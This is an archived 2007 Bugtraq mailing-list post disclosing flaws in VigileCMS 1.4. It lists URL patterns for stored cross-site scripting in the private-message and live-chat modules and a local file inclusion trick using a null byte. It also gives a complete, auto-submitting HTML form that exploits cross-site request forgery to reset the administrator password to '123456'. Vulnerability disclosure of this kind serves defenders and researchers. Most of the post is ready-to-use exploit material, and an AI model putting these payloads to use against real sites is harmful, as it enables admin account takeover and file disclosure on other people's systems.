lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 18 Nov 2007 13:24:49 -0000
From: info@...ncosmo.com
To: bugtraq@...urityfocus.com
Subject: VigileCMS 1.4 Multiple Remote Vulnerabilities

VigileCMS 1.4 Multiple Remote Vulnerabilities
---------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------
   Author : DevilAuron (http://devilsnight.altervista.org)

   Vendor : VigileCMS 1.4
   Date   : [16-11-2007] (dd-mm-yyyy)


Permanent Xss:
---------------------------------------------------------------------------------------
http://[site]/[path]/index.php?module=vedipm&inviapm=true
http://[site]/[path]/index.php?module=live_chat
Insert on the message the xss


Local File Inclusion:
---------------------------------------------------------------------------------------
http://[site]/[path]/index.php?module=[somefile]%00


CSRF:
---------------------------------------------------------------------------------------
<form name="cambia" method="post" action="http://127.0.0.1/VIGILE_1.4/index.php?module=changepass">
<input type="password" name="new1" maxlength=20 value="123456">
<input type="password" name="new2" maxlength=20 value="123456">
<input type="hidden" name="pw" value="Cambia la Password">
</form>
<script>document.cambia.submit()</script>
<!-- This change the Admin password -->

---------------------------------------------------------------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ